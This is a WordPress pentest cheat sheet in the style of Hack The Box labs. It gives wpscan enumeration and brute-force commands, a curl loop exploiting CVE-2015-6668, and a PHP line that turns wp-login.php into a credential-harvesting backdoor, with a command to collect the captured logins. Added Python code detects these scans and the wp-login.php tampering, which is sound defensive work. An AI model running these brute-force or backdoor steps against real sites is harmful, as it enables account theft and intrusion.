Wordpress
Nmap Scan
nmap -n -p<PORT> --script http-wordpress-enum <DNS>
wpscan
Installation
gem install wpscan
Basic Scan
wpscan --url https://example.com
Users
wpscan --url https://example.com --enumerate u
Plugins
wpscan --url https://example.com --enumerate ap
Themes
wpscan --url https://example.com --enumerate at
With output
wpscan --url https://example.com --output example.json
Custom User-Agent
wpscan --url https://example.com --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
Disable TLS check
wpscan --url https://brainfuck.htb --disable-tls-checks
Brute-Forcing
With username
wpscan --url https://example.com --passwords passwords.txt --usernames admin
With users wordlist
wpscan --url https://example.com --passwords passwords.txt --usernames users.txt
With a custom wordlist
wpscan --url https://example.com --passwords custom.txt
Vulnerability Scanner
Full Scan
wpscan --url https://example.com --enumerate vp,vt,tt
Plugins
wpscan --url https://example.com --enumerate vp
Themes
wpscan --url https://example.com --enumerate vt
Timthumbs
wpscan --url https://example.com --enumerate tt
Uses WPVulnDB
wpscan --url https://example.com --enumerate vp,vt,tt --api-token YOUR_API_TOKEN
Vulnerabilities
CVE-2015-6668
There is a path traversal in the job-manager plugin version 0.7.25. By browsing to IP/index.php/jobs/apply/8/ and modifying the number in the URL, it is possible to find the names of existing applications.
Enumerate with curl
for i in $(seq 1 25); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep 'entry-title' | cut -d'>' -f2 | cut -d'<' -f1; done
Use this POC to look for files associated with an application.
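The wpscan enumeration and brute-force runs listed above, and the curl loop over job-application IDs, all leave a recognisable trace in the web server's access log. The following Python script is added here as an example and is not part of the original cheat sheet: it parses combined-format (Apache/nginx) log lines and raises three detections per source IP, the default WPScan User-Agent together with the user/plugin enumeration paths, repeated POSTs to wp-login.php from one client inside a short window, and a walk over many distinct /index.php/jobs/apply/N/ IDs. The log lines are constructed for the demo, and the enumeration path list and the thresholds are assumptions to tune for a real site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined-format access log line (Apache/nginx default layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Paths that wpscan's --enumerate u / ap / at options request (assumed set; extend as needed).
ENUM_PATHS = (
    re.compile(r"^/\?author=\d+"),
    re.compile(r"^/wp-json/wp/v2/users"),
    re.compile(r"^/wp-content/(plugins|themes)/[^/]+/readme\.txt$"),
)
# The job-manager application URL from the CVE-2015-6668 note, with the numeric ID captured.
JOB_APPLY_RE = re.compile(r"^/index\.php/jobs/apply/(\d+)/?$")


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status, ua; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def analyze(lines, login_threshold=10, login_window=timedelta(minutes=5), id_threshold=5):
    """Map each source IP to the sorted list of detections raised for it."""
    findings = defaultdict(set)
    login_posts = defaultdict(list)   # ip -> timestamps of POST /wp-login.php
    job_ids = defaultdict(set)        # ip -> distinct application IDs requested
    for rec in filter(None, map(parse_line, lines)):
        ip = rec["ip"]
        if "wpscan" in rec["ua"].lower():
            findings[ip].add("wpscan_user_agent")
        if any(p.match(rec["path"]) for p in ENUM_PATHS):
            findings[ip].add("user_or_plugin_enumeration")
        if rec["method"] == "POST" and rec["path"].split("?")[0] == "/wp-login.php":
            login_posts[ip].append(rec["ts"])
        m = JOB_APPLY_RE.match(rec["path"])
        if m:
            job_ids[ip].add(int(m.group(1)))
    # Brute force: login_threshold or more POSTs inside any login_window-sized sliding window.
    for ip, times in login_posts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > login_window:
                start += 1
            if end - start + 1 >= login_threshold:
                findings[ip].add("wp_login_bruteforce")
                break
    # ID walking: many distinct application IDs requested by one client.
    for ip, ids in job_ids.items():
        if len(ids) >= id_threshold:
            findings[ip].add("job_application_id_enumeration")
    return {ip: sorted(tags) for ip, tags in findings.items()}


def _entry(ip, hms, request, status, ua):
    """Build one constructed log line; the date and timestamps are fictional."""
    return f'{ip} - - [10/Oct/2023:{hms} +0000] "{request} HTTP/1.1" {status} 0 "-" "{ua}"'


WPSCAN_UA = "WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)"
# Constructed sample log: a wpscan run, a login brute force, an ID walk, and one normal visitor.
SAMPLE_LOG = (
    [_entry("203.0.113.5", "13:55:01", "GET /?author=1", 301, WPSCAN_UA),
     _entry("203.0.113.5", "13:55:02", "GET /wp-json/wp/v2/users", 200, WPSCAN_UA),
     _entry("203.0.113.5", "13:55:03", "GET /wp-content/plugins/job-manager/readme.txt", 200, WPSCAN_UA)]
    + [_entry("198.51.100.7", f"14:00:{s:02d}", "POST /wp-login.php", 200, "Mozilla/5.0")
       for s in range(1, 13)]
    + [_entry("192.0.2.9", f"14:10:{i:02d}", f"GET /index.php/jobs/apply/{i}/", 200, "curl/7.88.1")
       for i in range(1, 26)]
    + [_entry("10.0.0.4", "14:20:00", "GET /index.php/jobs/apply/8/", 200, "Mozilla/5.0"),
       _entry("10.0.0.4", "14:21:00", "POST /wp-login.php", 302, "Mozilla/5.0")]
)

if __name__ == "__main__":
    for ip, tags in analyze(SAMPLE_LOG).items():
        print(ip, ", ".join(tags))
```

The User-Agent rule only catches a scanner that keeps its default UA (the cheat sheet's own --user-agent option defeats it), so the path- and rate-based rules carry the real weight; the sliding window over login POSTs is what distinguishes a brute force from a busy but legitimate login page.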
Harvesting Credentials
If it is possible to write to wp-login.php, add this line just after <?php:
file_put_contents("/var/www/html/dev_wiki/hijack.txt", $_POST['log'] . " : " . $_POST['pwd'], FILE_APPEND);
Use this command to fetch the hijacked file as soon as it is used:
watch -n 1 curl -s -X GET http://10.10.10.78/dev_wiki/hijack.txt
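From the defender's side, the wp-login.php tampering described above is caught by file integrity checking. The Python example below is added here and is not from the original page: it compares the file's SHA-256 against a recorded known-good value and, as a second signal, flags any line that reads a login field from the request superglobals and hands it to a write or network sink. The clean and tampered file contents are constructed stand-ins, not the real WordPress source, and the reference hash is computed from the constructed clean copy; in production it comes from your deployment pipeline or from WP-CLI's wp core verify-checksums.

```python
import hashlib
import re

# Constructed stand-in for the head of a pristine wp-login.php (not the real WordPress source).
CLEAN_WP_LOGIN = """<?php
/**
 * WordPress User Page
 */
require __DIR__ . '/wp-load.php';
"""

# The same file with the credential-capturing line from the cheat sheet inserted after <?php.
TAMPERED_WP_LOGIN = CLEAN_WP_LOGIN.replace(
    "<?php\n",
    "<?php\n"
    'file_put_contents("/var/www/html/dev_wiki/hijack.txt", '
    "$_POST['log'] . \" : \" . $_POST['pwd'], FILE_APPEND);\n",
    1,
)

# PHP calls that persist or send data; none of them belong next to a credential read in core.
SINK_RE = re.compile(
    r"\b(file_put_contents|fwrite|fopen|error_log|mail|curl_exec|file_get_contents)\s*\(", re.I
)
# Reads of the login form's fields from the request superglobals.
CRED_RE = re.compile(r"\$_(POST|REQUEST|GET)\s*\[\s*['\"](log|pwd|user_login|user_pass)['\"]\s*\]")


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


# Reference hash recorded at deploy time; here taken from the constructed clean copy.
KNOWN_GOOD_HASH = sha256_hex(CLEAN_WP_LOGIN)


def check_wp_login(content: str, known_good_hash: str = KNOWN_GOOD_HASH) -> dict:
    """Report whether the file matches its reference hash and list the lines that read a
    credential field and pass it to a sink on the same line."""
    suspicious = []
    for lineno, line in enumerate(content.splitlines(), start=1):
        if CRED_RE.search(line) and SINK_RE.search(line):
            suspicious.append((lineno, line.strip()))
    return {
        "hash_match": sha256_hex(content) == known_good_hash,
        "suspicious_lines": suspicious,
    }


if __name__ == "__main__":
    for label, body in (("clean", CLEAN_WP_LOGIN), ("tampered", TAMPERED_WP_LOGIN)):
        rep = check_wp_login(body)
        print(label, "hash_match=%s" % rep["hash_match"], rep["suspicious_lines"])
```

The hash comparison is the authoritative check, since any edit to a core file changes it; the line-level pattern only helps triage what changed and misses an injection that splits the read and the sink across several lines. Run it from a cron job or a file-integrity monitor rather than by hand, because the cheat sheet's watch loop shows how quickly captured logins are collected.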